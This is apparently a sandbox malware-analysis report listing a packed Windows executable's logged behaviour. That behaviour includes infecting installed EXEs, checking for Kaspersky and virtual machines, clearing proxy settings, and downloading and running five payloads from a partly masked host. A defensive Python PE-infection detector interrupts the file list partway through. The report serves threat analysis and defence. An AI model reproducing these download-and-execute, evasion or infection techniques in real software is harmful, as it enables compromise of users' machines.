VirSCAN

File information
Safety rating: 20
Behavior list
Basic Information
MD5: 3a1758b797d6438047e7e03883f430b5
File type: EXE
Production company:
Version: 1.0.0.1 (1, 0, 0, 1)
Packer / compiler information: PACKER:UPolyX v0.5
Key behavior
Behavior description: Modifies existing system EXE files
details: C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
C:\Program Files\e\sdk\tools\resym.exe
C:\Program Files\e\setup\mksetup.exe
C:\Program Files\e\setup\setup.exe
C:\Program Files\e\setup\setup_jt.exe
C:\Program Files\e\tools\about.exe
C:\Program Files\e\tools\dbcnv.exe
C:\Program Files\e\tools\dblang.exe
C:\Program Files\e\tools\DBManager.exe
C:\Program Files\e\tools\echo.exe
C:\Program Files\e\tools\egrid.exe
C:\Program Files\e\tools\elib.exe
C:\Program Files\e\tools\EvaDesigner.exe
Behavior description: Calls special system functions
details: N/A
Behavior description: Drops sensitive file in system directory
details: C:\WINDOWS\system32\c_31892.nls
Behavior description: Compares suspicious process names
details: lstrcmpiA: avp.exe <------> [System Process] Des: Kaspersky
lstrcmpiA: avp.exe <------> System Des: Kaspersky
lstrcmpiA: avp.exe <------> smss.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> csrss.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> winlogon.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> services.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> lsass.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> RFcxService.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> xwocthlp.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> svchost.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> spoolsv.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> jqs.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> RQCpgradeHelper.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> alg.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> explorer.exe Des: Kaspersky
Behavior description: Searches for suspicious process names
details: strstr: avp.exe <------> Des: Kaspersky
Behavior description: Sets special folder attributes
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description: Detects virtual machine by file lookup
details: FindFirstFileEx: FileName = C:\Program Files\Oracle\VirtualBox Guest Additions\*
FindFirstFileEx: FileName = C:\Program Files\VMware\*
Process behavior
Behavior description: Creates process with hidden window
details: ImagePath = , CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.bat"
Behavior description: Creates process
details: [0x00000c40]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.bat" "
Behavior description: Creates process from newly created file
details: [0x00000a70]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdtjpw.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdtjpw.exe
Behavior description: Creates process from downloaded file
details: [0x00000b14]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe
[0x00000b3c]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe
[0x00000b44]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe
[0x00000b5c]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2FCD1ED0.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2FCD1ED0.exe
[0x00000b74]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2AAB365E.exe, CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2AAB365E.exe
Behavior description: Creates local thread
details: TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2680, StartAddress = 00401099, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2684, StartAddress = 00402B8C, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2688, StartAddress = 00402B7D, Parameter = 005C3A43
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2692, StartAddress = 00402B7D, Parameter = 005C3A44
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2696, StartAddress = 00402B7D, Parameter = 005C3A58
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2716, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2792, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 2796, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 3096, StartAddress = 00402845, Parameter = 00000000
TargetProcess: kdtjpw.exe, InheritedFromPID = 2648, ProcessID = 2672, ThreadID = 3132, StartAddress = 765E964D, Parameter = 001C4730
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2648, ThreadID = 3308, StartAddress = 77C0A341, Parameter = 003F3EC0
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2648, ThreadID = 3328, StartAddress = 77C0A341, Parameter = 003F3F50
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2648, ThreadID = 3332, StartAddress = 77C0A341, Parameter = 003F3F50
Behavior description: Enumerates processes
details: N/A
File behavior
Behavior description: Creates file
details: C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k1[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k2[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k3[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k4[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k5[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.bat
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe
Behavior description: Modifies existing system EXE files
details: C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
C:\Program Files\e\sdk\tools\resym.exe
C:\Program Files\e\setup\mksetup.exe
C:\Program Files\e\setup\setup.exe
C:\Program Files\e\setup\setup_jt.exe
C:\Program Files\e\tools\about.exe
C:\Program Files\e\tools\dbcnv.exe
C:\Program Files\e\tools\dblang.exe
C:\Program Files\e\tools\DBManager.exe
C:\Program Files\e\tools\echo.exe
C:\Program Files\e\tools\egrid.exe
C:\Program Files\e\tools\elib.exe
C:\Program Files\e\tools\EvaDesigner.exe
Behavior description: Creates executable file
details: C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe
Behavior description: Modifies script file
details: C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.bat ---> Offset = 0
Behavior description: Copies file
details: C:\Program Files\WinRAR\Rar.exe ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.exe
Behavior description: Modifies executable file via memory mapping
details: C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\e\e.exe
C:\Program Files\e\sdk\cpp\tools\guidgen.exe
C:\Program Files\e\sdk\tools\resym.exe
C:\Program Files\e\setup\mksetup.exe
C:\Program Files\e\setup\setup.exe
C:\Program Files\e\setup\setup_jt.exe
C:\Program Files\e\tools\about.exe
C:\Program Files\e\tools\dbcnv.exe
C:\Program Files\e\tools\dblang.exe
C:\Program Files\e\tools\DBManager.exe
C:\Program Files\e\tools\echo.exe
C:\Program Files\e\tools\egrid.exe
C:\Program Files\e\tools\elib.exe
C:\Program Files\e\tools\EvaDesigner.exe
Behavior description: Deletes file
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k1[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k2[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k3[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k4[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\k5[1].rar
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe
Behavior description: Searches for files
details: FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdtjpw.exe
FileName = C:\*
FileName = C:\222c25ed\*
FileName = C:\222c25ed\IE8-Setup-Full\*
FileName = D:\*
FileName = X:\*
FileName = C:\222c25ed\IE8-Setup-Full\log\*
FileName = C:\AnalyzeControl\*
FileName = C:\DiskD\*
FileName = C:\DiskX\*
FileName = C:\EasyWebSvr\*
Behavior description: Drops sensitive file in system directory
details: C:\WINDOWS\system32\c_31892.nls
Behavior description: Sets special folder attributes
details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description: Modifies file content
details: C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe ---> Offset = 0
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 258048
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 258673
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 0
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> Offset = 262144
C:\Program Files\e\e.exe ---> Offset = 1970176
C:\Program Files\e\e.exe ---> Offset = 1970801
C:\Program Files\e\e.exe ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe ---> Offset = 0
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 24576
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 25201
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 0
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> Offset = 28672
C:\Program Files\e\sdk\tools\resym.exe ---> Offset = 126976
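The write pattern in the "Modifies file content" list is the same for every host file: one write at a 4 KiB-aligned offset, a second write 625 bytes further on, a rewrite of the header at offset 0, and a write 4 KiB past the first. Combined with the "via memory mapping" entry and the failed signature checks below, that is the shape an appended-code file infector leaves behind. The following Python is an added example, not VirSCAN's code and not the sample's: it parses a PE section table and flags the layout artefacts such an infection typically produces (entry point moved into the last section, a writable and executable last section, bytes past the last section's raw data). The page does not show this sample's exact infection routine, so these heuristics are generic assumptions; `build_pe` and the `CLEAN`/`INFECTED` images are constructed test inputs, not files from the report.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER (40 bytes)
FILE_HEADER_FMT = "<HHIIIHH"      # IMAGE_FILE_HEADER (20 bytes)


def parse_pe(data):
    """Return (AddressOfEntryPoint, sections) from a PE32/PE32+ file image.
    Each section is a dict with va, vsize, raw_ptr, raw_size, chars."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    fh = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from(FILE_HEADER_FMT, data, fh)
    opt = fh + 20
    if struct.unpack_from("<H", data, opt)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_ptr": rptr,
                         "raw_size": rsize, "chars": chars})
    return entry, sections


def infection_indicators(data):
    """Heuristics for appended-code infection of a PE on disk (assumed generic
    infector behaviour, not the routine of this specific sample). Returns the
    indicator names that fire; an empty list means nothing suspicious was seen."""
    entry, secs = parse_pe(data)
    hits = []
    ep_sec = next((s for s in secs
                   if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"])), None)
    if ep_sec is None:
        hits.append("ep_outside_sections")
    elif len(secs) > 1 and ep_sec is secs[-1]:
        hits.append("ep_in_last_section")     # compiled code normally sits in the first section
    last = secs[-1]
    if last["chars"] & IMAGE_SCN_MEM_EXECUTE and last["chars"] & IMAGE_SCN_MEM_WRITE:
        hits.append("last_section_rwx")
    raw_end = max(s["raw_ptr"] + s["raw_size"] for s in secs)
    if len(data) > raw_end:
        hits.append("overlay")                 # bytes past the last section's raw data
    return hits


def build_pe(entry_rva, sections, overlay=b""):
    """Build a minimal, non-runnable PE32 image for testing: DOS header with
    e_lfanew, PE signature, file header, optional header, section table and
    zero-filled section data. sections: (name, va, size, raw_ptr, characteristics)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    file_hdr = struct.pack(FILE_HEADER_FMT, 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(struct.pack(SECTION_FMT, name.ljust(8, b"\0"), size, va, size, rptr,
                                 0, 0, 0, 0, chars)
                     for name, va, size, rptr, chars in sections)
    image = bytearray(max(rptr + size for _, _, size, rptr, _ in sections))
    header = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table
    image[:len(header)] = header
    return bytes(image) + overlay


# Constructed samples: a clean-looking layout, and the same file with an appended
# RWX section that now holds the entry point, the shape an infector leaves behind.
CLEAN = build_pe(0x1010, [(b".text", 0x1000, 0x200, 0x400, 0x60000020),
                          (b".data", 0x2000, 0x200, 0x600, 0xC0000040)])
INFECTED = build_pe(0x3000, [(b".text", 0x1000, 0x200, 0x400, 0x60000020),
                             (b".data", 0x2000, 0x200, 0x600, 0xC0000040),
                             (b".x", 0x3000, 0x400, 0x800, 0xE0000020)])

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, infection_indicators(blob) or "no indicators")
```

On a real host the same function would be run over the fifteen paths listed under "MD5 of modified executable files"; a hit on any indicator is a reason to compare the file's hash against a known-good copy rather than trust a signature check alone, since the report already shows the signatures failing after modification.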
Network behavior
Behavior description: Downloads file
details: URLDownloadToFileW: http://dd****et:799/cj//k1.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
URLDownloadToFileW: http://dd****et:799/cj//k2.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe
URLDownloadToFileW: http://dd****et:799/cj//k3.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe
URLDownloadToFileW: http://dd****et:799/cj//k4.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2FCD1ED0.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe
URLDownloadToFileW: http://dd****et:799/cj//k5.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2AAB365E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe
Behavior description: Connects to specified site
details: InternetConnectA: ServerName = dd****et, PORT = 799, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
Behavior description: Opens HTTP connection
details: InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
Behavior description: Establishes socket connection to a specified host
details: URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x00000284
URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x000002a4
URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x0000029c
URL: dd****et, IP: **.133.40.**:799, SOCKET = 0x0000028c
IP: **.0.0.**:8000, SOCKET = 0x0000010c
Behavior description: Reads network file
details: hFile = 0x00cc000c, BytesToRead = 2048, BytesRead = 2048.
Behavior description: Sends HTTP packet
details: GET /cj//k1.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k2.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k3.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k4.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
GET /cj//k5.rar HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: dd****et:799 Connection: Keep-Alive
Behavior description: Opens HTTP request
details: HttpOpenRequestA: dd****et:799/cj//k1.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k2.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k3.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k4.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: dd****et:799/cj//k5.rar, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
Behavior description: Resolves host address by name
details: GetAddrInfoW: dd****et
Registry behavior
Behavior description: Modifies registry
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
\REGISTRY\MACHINE\SOFTWARE\GTplus\Time
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7c722ed1.bat
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\x\ConnectGroup
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\x\MarkTime
\REGISTRY\USER\S-*\Software\Microsoft\ActiveMovie\devenum\Version
Behavior description: Deletes registry values
details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior description: Calls special system functions
details: N/A
Behavior description: Creates mutex
details: CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
RasPbFile
127.0.0.1:8000
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-*
Behavior description: Creates event object
details: EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = Global\crypt32LogoffEvent
Behavior description: Compares suspicious process names
details: lstrcmpiA: avp.exe <------> [System Process] Des: Kaspersky
lstrcmpiA: avp.exe <------> System Des: Kaspersky
lstrcmpiA: avp.exe <------> smss.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> csrss.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> winlogon.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> services.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> lsass.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> RFcxService.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> xwocthlp.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> svchost.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> spoolsv.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> jqs.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> RQCpgradeHelper.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> alg.exe Des: Kaspersky
lstrcmpiA: avp.exe <------> explorer.exe Des: Kaspersky
Behavior description: MD5 of modified executable files
details: C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 0dde047d9c26e8035bd96d411006ad39
C:\Program Files\e\e.exe ---> 8d533455307b9e64fda610a234db28e0
C:\Program Files\e\sdk\cpp\tools\guidgen.exe ---> 8160b1d33edc45c73cc512b7b8e190fe
C:\Program Files\e\sdk\tools\resym.exe ---> 8931220f2b21dc14a4ee888242847525
C:\Program Files\e\setup\mksetup.exe ---> 7ee5b4159e3e5661e772c7c67afadc71
C:\Program Files\e\setup\setup.exe ---> 24b120da1e6979966323a9b6f58d5bae
C:\Program Files\e\setup\setup_jt.exe ---> a0a4a6ef7536d682155422f77070312f
C:\Program Files\e\tools\about.exe ---> fe99f6c80efaf540ad9025747b7c7ccf
C:\Program Files\e\tools\dbcnv.exe ---> 8e13bd96d8e2ca3ff29d141504024833
C:\Program Files\e\tools\dblang.exe ---> 7c4b4b2739e9ad1b941c88d972c1b329
C:\Program Files\e\tools\DBManager.exe ---> f03e9bfe6d864fb303870de28c44eae8
C:\Program Files\e\tools\echo.exe ---> 8ce96ee1f5b6ff8369c7b30c9e411c0f
C:\Program Files\e\tools\egrid.exe ---> 0088810676e9c7e4931ba15331d24815
C:\Program Files\e\tools\elib.exe ---> 97bdd2554097cc5a6103137cb304e0a0
C:\Program Files\e\tools\EvaDesigner.exe ---> 0079df2a8ca1b9ac97099a033eb1ba8a
Behavior description: Adjusts process token privileges
details: SE_DEBUG_PRIVILEGE
SE_LOAD_DRIVER_PRIVILEGE
Behavior description: Opens event
details: HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
_fCanRegisterWithShellService
Global\crypt32LogoffEvent
Behavior description: Signature information of modified executable files
details: C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe (signature verification: failed)
C:\Program Files\e\e.exe (signature verification: failed)
C:\Program Files\e\sdk\cpp\tools\guidgen.exe (signature verification: failed)
C:\Program Files\e\sdk\tools\resym.exe (signature verification: failed)
C:\Program Files\e\setup\mksetup.exe (signature verification: failed)
C:\Program Files\e\setup\setup.exe (signature verification: failed)
C:\Program Files\e\setup\setup_jt.exe (signature verification: failed)
C:\Program Files\e\tools\about.exe (signature verification: failed)
C:\Program Files\e\tools\dbcnv.exe (signature verification: failed)
C:\Program Files\e\tools\dblang.exe (signature verification: failed)
C:\Program Files\e\tools\DBManager.exe (signature verification: failed)
C:\Program Files\e\tools\echo.exe (signature verification: failed)
C:\Program Files\e\tools\egrid.exe (signature verification: failed)
C:\Program Files\e\tools\elib.exe (signature verification: failed)
C:\Program Files\e\tools\EvaDesigner.exe (signature verification: failed)
Behavior description: Executable file signature information
details: C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe (signature verification: failed)
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe (signature verification: failed)
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe (signature verification: failed)
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe (signature verification: failed)
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe (signature verification: failed)
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe (signature verification: failed)
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe (signature verification: failed)
Behavior description: Calls Sleep function
details: [1]: MilliSeconds = 0.
[2]: MilliSeconds = 0.
[3]: MilliSeconds = 0.
[4]: MilliSeconds = 0.
[5]: MilliSeconds = 0.
[6]: MilliSeconds = 0.
[7]: MilliSeconds = 0.
[8]: MilliSeconds = 0.
[9]: MilliSeconds = 0.
[10]: MilliSeconds = 0.
Behavior description: Executable file MD5
details: C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe ---> 56b2c3810dba2e939a8bb9fa36d3cf96
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\2FCD1ED0.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\2AAB365E.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\7c722ed1.exe ---> 4dac39e91c9f7cd67510f7e1e1d5decd
Behavior description: Opens mutex
details: DBWinMutex
Local\!IETld!Mutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
Behavior description: Searches for suspicious process names
details: strstr: avp.exe <------> Des: Kaspersky
Behavior description: Detects virtual machine by file lookup
details: FindFirstFileEx: FileName = C:\Program Files\Oracle\VirtualBox Guest Additions\*
FindFirstFileEx: FileName = C:\Program Files\VMware\*
